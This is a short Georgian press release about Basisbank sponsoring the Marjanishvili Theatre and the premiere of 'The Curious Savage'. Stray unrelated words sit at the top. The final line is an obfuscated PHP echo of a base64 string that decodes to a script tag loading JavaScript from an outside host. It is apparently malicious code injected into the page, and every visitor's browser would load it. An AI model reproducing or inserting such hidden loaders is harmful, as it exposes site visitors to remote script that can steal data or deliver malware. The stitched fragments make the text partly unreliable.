celsiusi
ავერსი საქკაბელი

 ბაზისბანკი, როგორც მაღალი სოციალური პასუხისმგებლობის მქონე ფინანსური ინსტიტუტი, ქართული კულტურის მხარდამჭერი პროექტების ფარგლებში, მესამე წელია კოტე მარჯანიშვილის სახელობის სახელმწიფო დრამატული თეატრის გენერალური სპონსორია.

ბაზისბანკსა და მარჯანიშვილის თეატრს შორის თანამშრომლობა მიზნად ისახავს თეატრალური ხელოვნების პოპულარიზაციას და ერთობლივი, მნიშვნელოვანი პროექტების განხორციელებას.

ბაზისბანკის გენერალური სპონსორობის ფარგლებში, 27 და 28 აპრილს მარჯანიშვილის თეატრის დიდ სცენაზე რეჟისორ ციცინო კობიაშვილის სპექტაკლის „უცნაური მისის სევიჯის„ პრემიერა გაიმართება.

„უცნაური მისის სევიჯი“ ლირიკული კომედიაა, რომელიც მსოფლიოს მრავალ სცენაზე დაიდგა. მარჯანიშვილის თეატრი ამ პიესის მოტივებზე აგებულ სპექტაკლს შესთავაზებს მაყურებელს. „უცნაური მისის სევიჯი“ რწმენას და იმედს არ კარგავს, რომ სიკეთის, თანაგრძნობის და თანადგომის უნარი ჯერ კიდევ შესწევს კაცობრიობას. რომ სიხარბეს სიყვარული ამარცხებს, ოცნებებსაც კეთილი და უანგარო ადამიანები ასრულებენ.

152
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");